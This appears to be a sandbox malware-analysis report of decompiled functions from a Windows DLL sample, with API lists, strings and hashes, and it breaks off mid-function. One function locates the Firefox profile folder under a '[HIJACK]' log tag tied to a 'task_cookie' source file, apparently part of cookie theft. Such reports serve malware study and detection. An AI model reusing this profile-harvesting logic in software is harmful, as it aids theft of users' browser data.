                                                  				char _v539;
                                                  				char _v540;
                                                  				CHAR* _v544;
                                                  				intOrPtr _t42;
                                                  				void* _t46;
                                                  				void* _t56;
                                                  				void* _t76;
                                                  				void* _t77;
                                                  				void* _t79;
                                                  				void* _t80;
                                                  				void* _t82;
                                                  
                                                  				_t75 = __edi;
                                                  				_v272 = 0;
                                                  				_v268 = 0;
                                                  				E10025A10(__edi,  &_v267, 0, 0x103);
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
                                                  				E10025E1D( &_v268,  &_v268, 0x104, "\\Mozilla\\Firefox\\profiles.ini");
                                                  				_t79 = _t77 + 0x18;
                                                  				if(PathFileExistsA( &_v268) != 0) {
                                                  					_t42 = E10145A40( &_v268);
                                                  					_t80 = _t79 + 4;
                                                  					_v276 = _t42;
                                                  					if(_v276 > 0xa) {
                                                  						_v540 = 0;
                                                  						E10025A10(_t75,  &_v539, 0, 0x103);
                                                  						GetPrivateProfileStringA("Profile0", "Path", 0,  &_v540, 0x104,  &_v268);
                                                  						_t46 = E10023280( &_v540);
                                                  						_t82 = _t80 + 0x10;
                                                  						if(_t46 > 0) {
                                                  							_v544 = 0;
                                                  							while(1) {
                                                  								_t56 = E10023280( &_v540);
                                                  								_t82 = _t82 + 4;
                                                  								if(_v544 >= _t56) {
                                                  									goto L9;
                                                  								}
                                                  								if( *((char*)(_t76 + _v544 - 0x218)) == 0x2f) {
                                                  									 *((char*)(_t76 + _v544 - 0x218)) = 0x5c;
                                                  								}
                                                  								_v544 =  &(_v544[1]);
                                                  							}
                                                  						}
                                                  						L9:
                                                  						PathRemoveFileSpecA( &_v268);
                                                  						E10025E1D( &_v268,  &_v268, 0x104, "\\");
                                                  						E10025E1D( &_v268,  &_v268, 0x104,  &_v540);
                                                  						if(PathFileExistsA( &_v268) != 0) {
                                                  							_push( &_v268);
                                                  							_push(0x104);
                                                  							_push("FirefoxUserPath");
                                                  							E10145200(_t75, "[HIJACK][%s][%s][%d]: strFirefoxUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
                                                  							E100023C0(_a4,  &_v268);
                                                  							_v272 = 1;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v272;
                                                  			}


                                                  APIs
                                                  • _memset.LIBCMT ref: 1014BE28
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1014BE3D
                                                  • _strcat_s.LIBCMT ref: 1014BE54
                                                  • PathFileExistsA.SHLWAPI(?), ref: 1014BE63
                                                    • Part of subcall function 10145A40: FindFirstFileA.KERNEL32(1014BE7D,?), ref: 10145A5E
                                                    • Part of subcall function 10145A40: FindClose.KERNEL32(000000FF), ref: 10145A86
                                                  • _memset.LIBCMT ref: 1014BEA8
                                                  • GetPrivateProfileStringA.KERNEL32(Profile0,Path,00000000,?,00000104,?), ref: 1014BECF
                                                  • _strlen.LIBCMT ref: 1014BEDC
                                                  • _strlen.LIBCMT ref: 1014BF0A
                                                  • PathRemoveFileSpecA.SHLWAPI(?), ref: 1014BF44
                                                  • _strcat_s.LIBCMT ref: 1014BF5B
                                                  • _strcat_s.LIBCMT ref: 1014BF76
                                                  • PathFileExistsA.SHLWAPI(?), ref: 1014BF85
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,FirefoxUserPath,00000104,?), ref: 1014BFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FilePath$Find_strcat_s$Exists_memset_strlen$CloseFirstFolderNamePrivateProfileRemoveSpecSpecialString
                                                  • String ID: .\task_cookie\default_browser.cpp$FirefoxUserPath$Path$Profile0$[HIJACK][%s][%s][%d]: strFirefoxUserPath = %s$\$\Mozilla\Firefox\profiles.ini
                                                  • API String ID: 261838357-2048179301
                                                  • Opcode ID: 61ff19aa0bb1e31c4214e411524ec3c5b638b2acafb5d465548dd44bc976a712
                                                  • Instruction ID: 5c61fa6741f18a0e6eb4d6f31c1c38185a34881f3851f4e82b563baab361f6ea
                                                  • Opcode Fuzzy Hash: 61ff19aa0bb1e31c4214e411524ec3c5b638b2acafb5d465548dd44bc976a712
                                                  • Instruction Fuzzy Hash: EC4180B9D4021C9BDB50DB60DCCABDA7338EB24700F5045D4FA49A6191EBB56BC8CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10147900(void* __ebx, void* __edi, void* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				struct _WIN32_FIND_DATAA _v324;
                                                  				char _v587;
                                                  				char _v588;
                                                  				char _v852;
                                                  				char _v1115;
                                                  				char _v1116;
                                                  				void* _v1120;
                                                  				int _t36;
                                                  				void* _t43;
                                                  				int _t45;
                                                  				int _t56;
                                                  				void* _t65;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  				void* _t93;
                                                  
                                                  				_t88 = __esi;
                                                  				_t87 = __edi;
                                                  				_t65 = __ebx;
                                                  				_t36 = PathFileExistsA(_a4);
                                                  				if(_t36 == 0) {
                                                  					return _t36;
                                                  				}
                                                  				_v588 = 0;
                                                  				E10025A10(__edi,  &_v587, 0, 0x103);
                                                  				_v1116 = 0;
                                                  				E10025A10(_t87,  &_v1115, 0, 0x103);
                                                  				E10025A8A( &_v1115,  &_v588, 0x104, _a4);
                                                  				E10025E1D( &_v588,  &_v588, 0x104, "\\*.*");
                                                  				_t93 = _t89 + 0x30;
                                                  				_t43 = FindFirstFileA( &_v588,  &_v324);
                                                  				_v1120 = _t43;
                                                  				__eflags = _v1120 - 0xffffffff;
                                                  				if(_v1120 == 0xffffffff) {
                                                  					return _t43;
                                                  				} else {
                                                  					do {
                                                  						__eflags = _v324.dwFileAttributes & 0x00000010;
                                                  						if((_v324.dwFileAttributes & 0x00000010) != 0) {
                                                  							__eflags = _v324.cFileName - 0x2e;
                                                  							if(_v324.cFileName != 0x2e) {
                                                  								E10025A10(_t87,  &_v1116, 0, 0x104);
                                                  								E10025A8A(_a4,  &_v1116, 0x104, _a4);
                                                  								E10025E1D(_a4,  &_v1116, 0x104, "\\");
                                                  								E10025E1D( &(_v324.cFileName),  &_v1116, 0x104,  &(_v324.cFileName));
                                                  								E10025E1D( &(_v324.cFileName),  &_v1116, 0x104, "\\");
                                                  								E10025E1D(_a12,  &_v1116, 0x104, _a12);
                                                  								_t93 = _t93 + 0x48;
                                                  								_t56 = PathFileExistsA( &_v1116);
                                                  								__eflags = _t56;
                                                  								if(_t56 != 0) {
                                                  									PathRemoveFileSpecA( &_v1116);
                                                  									E10025A10(_t87,  &_v852, 0, 0x104);
                                                  									E10023600(_t65, _t87, _t88,  &_v852,  &_v1116, E10023280( &_v1116));
                                                  									_t93 = _t93 + 0x1c;
                                                  									E10002550(_a8,  &_v1116, __eflags,  &_v852);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t45 = FindNextFileA(_v1120,  &_v324);
                                                  						__eflags = _t45;
                                                  					} while (_t45 != 0);
                                                  					return FindClose(_v1120);
                                                  				}
                                                  			}


                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strcat_s$File$Find_memset$ExistsPath_strcpy_s$CloseFirstNext
                                                  • String ID: \*.*
                                                  • API String ID: 3182140180-1173974218
                                                  • Opcode ID: 1f2e2a1f41dc3129687c67fed6cbad1ed6dc025b9d27629ebaed0d5e2a7ab81e
                                                  • Instruction ID: 50026323fc2088205c94d2414016c69e68ee20f80ede7d099e469dfed23808c1
                                                  • Opcode Fuzzy Hash: 1f2e2a1f41dc3129687c67fed6cbad1ed6dc025b9d27629ebaed0d5e2a7ab81e
                                                  • Instruction Fuzzy Hash: 2841B2F58006146BDB14DBA0DC86FDE7338EB44701F5486D8F709A6092EB75AB888FA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E10145D10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				struct _FILETIME _v12;
                                                  				short _v14;
                                                  				short _v16;
                                                  				short _v18;
                                                  				short _v20;
                                                  				short _v22;
                                                  				short _v26;
                                                  				char _v28;
                                                  				SYSTEMTIME* _v32;
                                                  				intOrPtr _v36;
                                                  				struct _SYSTEMTIME _v52;
                                                  				intOrPtr _v56;
                                                  				struct _FILETIME _v64;
                                                  				SYSTEMTIME* _t43;
                                                  
				_t45 = __edi;
				_v56 = E100253AE(__ebx, __edx, __edi, __esi, 0x14); // _malloc(20): buffer for the decimal result string
				E10025A10(__edi, _v56, 0, 0x14); // _memset(buffer, 0, 20)
				_v28 = 0x7b2; // builds a SYSTEMTIME for 1970-01-01 00:00:00: wYear = 1970, wMonth = 1, wDay = 1, time fields zero
				_v26 = 1;
				_v22 = 1;
				_v20 = 0;
				_v18 = 0;
				_v16 = 0;
				_v14 = 0;
				GetSystemTime( &_v52); // current UTC time
				SystemTimeToFileTime( &_v52,  &_v12); // now, as a 64-bit FILETIME (100 ns units)
				_t43 =  &_v28;
				SystemTimeToFileTime(_t43,  &_v64); // Unix epoch, as a FILETIME
				asm("sbb ecx, [ebp-0x38]"); // high dword of the 64-bit subtraction now - epoch
				_v36 = E1002BC50(_v12.dwLowDateTime - _v64.dwLowDateTime, _v12.dwHighDateTime, 0x2710, 0); // __aulldiv by 10000: milliseconds since the Unix epoch
				_v32 = _t43;
				_push(_v32);
				L10023965(_t45, _v56, "%lld", _v36); // sprintf-style formatting of the 64-bit millisecond count into the buffer
				return _v56; // caller receives a heap string such as a Unix timestamp in milliseconds
                                                  			}
Instruction addresses for the listing above (instruction column not preserved in this extract):
0x10145d10, 0x10145d20, 0x10145d2b, 0x10145d33, 0x10145d39, 0x10145d3f, 0x10145d45, 0x10145d4b, 0x10145d51, 0x10145d57, 0x10145d61, 0x10145d6f, 0x10145d79, 0x10145d7d, 0x10145d8c, 0x10145d9d, 0x10145da0, 0x10145da6, 0x10145db4, 0x10145dc2

                                                  APIs
                                                  • _malloc.LIBCMT ref: 10145D18
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • _memset.LIBCMT ref: 10145D2B
                                                  • GetSystemTime.KERNEL32(?), ref: 10145D61
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 10145D6F
                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 10145D7D
                                                  • __aulldiv.LIBCMT ref: 10145D98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$AllocHeap__aulldiv_malloc_memset
                                                  • String ID: %lld
                                                  • API String ID: 860742876-1962030014
                                                  • Opcode ID: 700ef544f816ee661cfc2d3abde6fe991a915025cd6f6b942d8576967d139f22
                                                  • Instruction ID: 16619ae10d9e8943b6d3f63e1c79c489d59666ec1cc21348ff4a954b40909d96
                                                  • Opcode Fuzzy Hash: 700ef544f816ee661cfc2d3abde6fe991a915025cd6f6b942d8576967d139f22
                                                  • Instruction Fuzzy Hash: 65110AB5D11209ABDF04DBE4D88AEEEB7B9FF44304F004508FA05BB251E7796644CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E10028D22(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                  				intOrPtr _v0;
                                                  				void* _v804;
                                                  				intOrPtr _v808;
                                                  				intOrPtr _v812;
                                                  				intOrPtr _t6;
                                                  				intOrPtr _t12;
                                                  				intOrPtr _t13;
                                                  				long _t17;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t22;
                                                  				intOrPtr _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr* _t31;
                                                  				void* _t34;
                                                  
                                                  				_t27 = __esi;
                                                  				_t26 = __edi;
                                                  				_t25 = __edx;
                                                  				_t22 = __ecx;
                                                  				_t21 = __ebx;
                                                  				_t6 = __eax;
				// This is the MSVC CRT stack-protector pair: __security_check_cookie (compare ecx with the
				// global __security_cookie at 0x102896c4) falling through into __report_gsfailure. The
				// IsDebuggerPresent / UnhandledExceptionFilter / TerminateProcess calls flagged in the
				// signatures are CRT boilerplate, not sample-specific anti-debug logic.
				_t34 = _t22 -  *0x102896c4; // 0x706cca93 = __security_cookie
				if(_t34 == 0) {
					asm("repe ret"); // cookie intact: return to caller
				}
				// cookie corrupted (stack buffer overrun): capture register state into the CRT's GS_ContextRecord
				 *0x10402078 = _t6;
				 *0x10402074 = _t22;
				 *0x10402070 = _t25;
				 *0x1040206c = _t21;
				 *0x10402068 = _t27;
				 *0x10402064 = _t26;
				 *0x10402090 = ss;
				 *0x10402084 = cs;
				 *0x10402060 = ds;
				 *0x1040205c = es;
				 *0x10402058 = fs;
				 *0x10402054 = gs;
				asm("pushfd");
				_pop( *0x10402088); // EFlags
				 *0x1040207c =  *_t31; // Eip (return address on the stack)
				 *0x10402080 = _v0; // Esp
				 *0x1040208c =  &_a4; // Ebp
				 *0x10401fc8 = 0x10001; // ContextFlags = CONTEXT_CONTROL
				 *0x10401f7c =  *0x10402080; // ExceptionAddress
				 *0x10401f70 = 0xc0000409; // ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
				 *0x10401f74 = 1; // ExceptionFlags = EXCEPTION_NONCONTINUABLE
				_t12 =  *0x102896c4; // 0x706cca93 = __security_cookie
				_v812 = _t12;
				_t13 =  *0x102896c8; // 0x8f93356c = __security_cookie_complement (~0x706cca93)
				_v808 = _t13;
				 *0x10401fc0 = IsDebuggerPresent(); // recorded so the report is only raised once when no debugger is attached
				_push(1);
				E1002B605(_t14);
				SetUnhandledExceptionFilter(0); // remove any user filter so the failure cannot be swallowed
				_t17 = UnhandledExceptionFilter(0x10172a28); // hand the STATUS_STACK_BUFFER_OVERRUN record to the default handler (WER)
				if( *0x10401fc0 == 0) {
					_push(1);
					E1002B605(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409); // fast-fail the process
                                                  			}
Instruction addresses for the listing above (instruction column not preserved in this extract; note the jump from 0x10028d2a to 0x100348e5 where __security_check_cookie falls through into __report_gsfailure):
0x10028d22, 0x10028d22, 0x10028d22, 0x10028d22, 0x10028d22, 0x10028d22, 0x10028d22, 0x10028d28, 0x10028d2a, 0x10028d2a, 0x100348e5, 0x100348ea, 0x100348f0, 0x100348f6, 0x100348fc, 0x10034902, 0x10034908, 0x1003490f, 0x10034916, 0x1003491d, 0x10034924, 0x1003492b, 0x10034932, 0x10034933, 0x1003493c, 0x10034944, 0x1003494c, 0x10034957, 0x10034966, 0x1003496b, 0x10034975, 0x1003497f, 0x10034984, 0x1003498a, 0x1003498f, 0x1003499b, 0x100349a0, 0x100349a2, 0x100349aa, 0x100349b5, 0x100349c2, 0x100349c4, 0x100349c6, 0x100349cb, 0x100349df

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 10034995
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100349AA
                                                  • UnhandledExceptionFilter.KERNEL32(10172A28), ref: 100349B5
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 100349D1
                                                  • TerminateProcess.KERNEL32(00000000), ref: 100349D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 7d7a95392daed21562f0adf87457f4944839031e0dd746fb079cb8030c60dc8b
                                                  • Instruction ID: b0bfddbdfe7abc5bd73f111c0b54b42900f0f8aba0d5a76ddfc3178f72c6c3ae
                                                  • Opcode Fuzzy Hash: 7d7a95392daed21562f0adf87457f4944839031e0dd746fb079cb8030c60dc8b
                                                  • Instruction Fuzzy Hash: 9F21CEB8911326DFE301DF28DBC8A853BF5FB08315F40412AEA08A76B9E7749985CF15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10145A40(CHAR* _a4) {
                                                  				struct _WIN32_FIND_DATAA _v324;
                                                  				intOrPtr _v328;
                                                  				void* _v332;
                                                  
				_v328 = 0; // size defaults to 0 when the path does not match anything
				_v332 = FindFirstFileA(_a4,  &_v324);
				if(_v332 != 0xffffffff) { // INVALID_HANDLE_VALUE
					_v328 = _v324.nFileSizeLow; // only the low 32 bits of the size are returned; nFileSizeHigh is ignored
				}
				FindClose(_v332); // called unconditionally, i.e. also on INVALID_HANDLE_VALUE
				return _v328;
                                                  			}
Instruction addresses for the listing above (instruction column not preserved in this extract):
0x10145a49, 0x10145a64, 0x10145a71, 0x10145a79, 0x10145a79, 0x10145a86, 0x10145a95

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(1014BE7D,?), ref: 10145A5E
                                                  • FindClose.KERNEL32(000000FF), ref: 10145A86
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: c9b70743daf889077228f2f50b5fd2014dcaf1e28faea37e84fc76739474dd9e
                                                  • Instruction ID: 9d44e6e2c7ddc49a73667ea1faf6e7adb3551f7bb64662363438a22e81cceeee
                                                  • Opcode Fuzzy Hash: c9b70743daf889077228f2f50b5fd2014dcaf1e28faea37e84fc76739474dd9e
                                                  • Instruction Fuzzy Hash: FEF0A5789002289BCB70DF68CD88BDDB7B9AB08310F2002D5E91DA32B1DA349E958F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10042F70(void* __eax, signed char* __ecx, signed char* _a4) {
                                                  				signed int _v4;
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				signed char* _v20;
                                                  				intOrPtr _t158;
                                                  				unsigned int _t162;
                                                  				signed int _t165;
                                                  				signed int _t166;
                                                  				intOrPtr _t167;
                                                  				signed int _t168;
                                                  				signed int _t169;
                                                  				signed char* _t170;
                                                  				signed int _t172;
                                                  				signed char* _t173;
                                                  				signed char* _t176;
                                                  				signed char* _t178;
                                                  				signed char* _t180;
                                                  				signed char _t191;
                                                  				signed int _t192;
                                                  				unsigned int _t198;
                                                  				signed char* _t199;
                                                  				signed int _t204;
                                                  				signed char* _t205;
                                                  				signed char* _t207;
                                                  				signed int _t213;
                                                  				signed short* _t214;
                                                  				signed int _t215;
                                                  				signed int _t222;
                                                  				signed char _t228;
                                                  				signed int _t229;
                                                  				signed int _t235;
                                                  				signed char* _t237;
                                                  				signed int _t240;
                                                  				signed int _t244;
                                                  				signed int _t247;
                                                  				signed int _t250;
                                                  				signed int _t253;
                                                  				signed int _t256;
                                                  				signed int _t259;
                                                  				signed char _t263;
                                                  				void* _t264;
                                                  				intOrPtr _t265;
                                                  				signed int _t267;
                                                  				signed char _t279;
                                                  				signed char _t284;
                                                  				signed int _t285;
                                                  				signed int _t286;
                                                  				signed int _t288;
                                                  				signed int _t289;
                                                  				signed int _t290;
                                                  				signed int _t291;
                                                  				signed int _t292;
                                                  				signed int _t293;
                                                  				signed int _t294;
                                                  				signed int _t295;
                                                  				unsigned int _t296;
                                                  				signed char* _t297;
                                                  				intOrPtr _t298;
                                                  				signed char* _t299;
                                                  				signed short* _t301;
                                                  				signed int _t302;
                                                  				signed int _t303;
                                                  				signed int _t304;
                                                  				signed int _t305;
                                                  				signed char* _t306;
                                                  				signed int _t309;
                                                  				signed int _t316;
                                                  				signed int _t321;
                                                  				signed int _t322;
                                                  				signed int _t323;
                                                  				signed int _t324;
                                                  				signed int _t325;
                                                  				signed int _t326;
                                                  				signed int _t327;
                                                  				signed int _t342;
                                                  				signed int _t343;
                                                  				signed char _t344;
                                                  				void* _t348;
                                                  				signed int _t349;
                                                  
                                                  				_t297 = __ecx;
                                                  				_t342 =  *(__ecx + 0x40);
                                                  				_t288 =  *(__ecx + 0x20);
                                                  				_t323 =  *(__ecx + 0x24);
                                                  				_t158 =  *((intOrPtr*)(__ecx + 0xc));
                                                  				_v20 =  &(_a4[__eax]);
                                                  				_v16 = _t158;
                                                  				_t213 = ((0x00000001 <<  *(__ecx + 2)) - 0x00000001 &  *(__ecx + 0x28)) << 4;
                                                  				_t235 = 1 + _t342;
                                                  				_v4 = _t235;
                                                  				_v12 =  *(_t158 + _t235 * 2 - 0x200) & 0x0000ffff;
                                                  				if(_t288 >= 0x1000000) {
                                                  					L4:
                                                  					_t162 = (_t288 >> 0xb) * _v12;
                                                  					if(_t323 >= _t162) {
                                                  						_t298 = _v16;
                                                  						_t289 = _t288 - _t162;
                                                  						_t324 = _t323 - _t162;
                                                  						_v12 =  *(_t298 + 0x20 + _t342 * 2) & 0x0000ffff;
                                                  						_t237 = _a4;
                                                  						if(_t289 >= 0x1000000) {
                                                  							L39:
                                                  							_t165 = (_t289 >> 0xb) * _v12;
                                                  							if(_t324 >= _t165) {
                                                  								_t290 = _t289 - _t165;
                                                  								_t325 = _t324 - _t165;
                                                  								_t166 =  *(_t298 + 0x38 + _t342 * 2) & 0x0000ffff;
                                                  								_v8 = 3;
                                                  								if(_t290 >= 0x1000000) {
                                                  									L44:
                                                  									_t240 = (_t290 >> 0xb) * _t166;
                                                  									_t167 = _v16;
                                                  									if(_t325 >= _t240) {
                                                  										_t299 = _a4;
                                                  										_t291 = _t290 - _t240;
                                                  										_t326 = _t325 - _t240;
                                                  										_v12 =  *(_t167 + 0x50 + _t342 * 2) & 0x0000ffff;
                                                  										if(_t291 >= 0x1000000) {
                                                  											L55:
                                                  											_t244 = (_t291 >> 0xb) * _v12;
                                                  											if(_t326 >= _t244) {
                                                  												_t168 =  *(_t167 + 0x68 + _t342 * 2) & 0x0000ffff;
                                                  												_t292 = _t291 - _t244;
                                                  												_t325 = _t326 - _t244;
                                                  												if(_t292 >= 0x1000000) {
                                                  													L60:
                                                  													_t247 = (_t292 >> 0xb) * _t168;
                                                  													if(_t325 >= _t247) {
                                                  														goto L62;
                                                  													} else {
                                                  														_t293 = _t247;
                                                  													}
                                                  													goto L63;
                                                  												} else {
                                                  													if(_t299 >= _v20) {
                                                  														goto L2;
                                                  													} else {
                                                  														_t292 = _t292 << 8;
                                                  														_t325 = _t325 << 0x00000008 |  *_t299 & 0x000000ff;
                                                  														_a4 =  &(_t299[1]);
                                                  														goto L60;
                                                  													}
                                                  												}
                                                  											} else {
                                                  												_t293 = _t244;
                                                  												goto L63;
                                                  											}
                                                  										} else {
                                                  											if(_t299 >= _v20) {
                                                  												goto L2;
                                                  											} else {
                                                  												_t291 = _t291 << 8;
                                                  												_t326 = _t326 << 0x00000008 |  *_t299 & 0x000000ff;
                                                  												_t299 =  &(_t299[1]);
                                                  												_a4 = _t299;
                                                  												goto L55;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t316 =  *(_t167 + _v4 * 2 - 0xc00) & 0x0000ffff;
                                                  										_t180 = _a4;
                                                  										_t292 = _t240;
                                                  										if(_t240 >= 0x1000000) {
                                                  											L48:
                                                  											_t247 = (_t292 >> 0xb) * _t316;
                                                  											if(_t325 >= _t247) {
                                                  												L62:
                                                  												_t293 = _t292 - _t247;
                                                  												_t325 = _t325 - _t247;
                                                  												L63:
                                                  												_t237 = _a4;
                                                  												_v4 = 0xc;
                                                  												_t301 = _v16 + 0xfffff600;
                                                  												goto L64;
                                                  											} else {
                                                  												if(_t247 >= 0x1000000 || _t180 < _v20) {
                                                  													return 3;
                                                  												} else {
                                                  													goto L2;
                                                  												}
                                                  											}
                                                  										} else {
                                                  											if(_t180 >= _v20) {
                                                  												goto L2;
                                                  											} else {
                                                  												_t292 = _t240 << 8;
                                                  												_t325 = _t325 << 0x00000008 |  *_t180 & 0x000000ff;
                                                  												_t180 =  &(_t180[1]);
                                                  												_a4 = _t180;
                                                  												goto L48;
                                                  											}
                                                  										}
                                                  									}
                                                  								} else {
                                                  									if(_t237 >= _v20) {
                                                  										goto L2;
                                                  									} else {
                                                  										_t290 = _t290 << 8;
                                                  										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
                                                  										_a4 =  &(_t237[1]);
                                                  										goto L44;
                                                  									}
                                                  								}
                                                  							} else {
                                                  								_t293 = _t165;
                                                  								_v4 = 0;
                                                  								_t301 = _t298 + 0xfffffa00;
                                                  								_v8 = 2;
                                                  								L64:
                                                  								_t169 =  *_t301 & 0x0000ffff;
                                                  								if(_t293 >= 0x1000000) {
                                                  									L67:
                                                  									_t250 = (_t293 >> 0xb) * _t169;
                                                  									_t170 = _a4;
                                                  									if(_t325 >= _t250) {
                                                  										_t343 = _t301[8] & 0x0000ffff;
                                                  										_t294 = _t293 - _t250;
                                                  										_t327 = _t325 - _t250;
                                                  										if(_t294 >= 0x1000000) {
                                                  											L72:
                                                  											_t253 = (_t294 >> 0xb) * _t343;
                                                  											if(_t327 >= _t253) {
                                                  												_t295 = _t294 - _t253;
                                                  												_t327 = _t327 - _t253;
                                                  												_t214 =  &(_t301[0x100]);
                                                  												_t344 = 0x10;
                                                  												_v12 = 0x100;
                                                  											} else {
                                                  												_t344 = 8;
                                                  												_t295 = _t253;
                                                  												_t214 = _t301 + 0x10 + _t213 * 2;
                                                  												_v12 = 8;
                                                  											}
                                                  											goto L75;
                                                  										} else {
                                                  											if(_t170 >= _v20) {
                                                  												goto L2;
                                                  											} else {
                                                  												_t294 = _t294 << 8;
                                                  												_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
                                                  												_t170 =  &(_t170[1]);
                                                  												_a4 = _t170;
                                                  												goto L72;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t295 = _t250;
                                                  										_t214 =  &(_t301[_t213]);
                                                  										_t344 = 0;
                                                  										_v12 = 8;
                                                  										L75:
                                                  										_t302 = 1;
                                                  										L76:
                                                  										while(1) {
                                                  											if(_t295 >= 0x1000000) {
                                                  												L79:
                                                  												_t256 = (_t295 >> 0xb) * (_t214[_t302] & 0x0000ffff);
                                                  												if(_t327 >= _t256) {
                                                  													_t295 = _t295 - _t256;
                                                  													_t327 = _t327 - _t256;
                                                  													_t302 = _t302 + _t302 + 1;
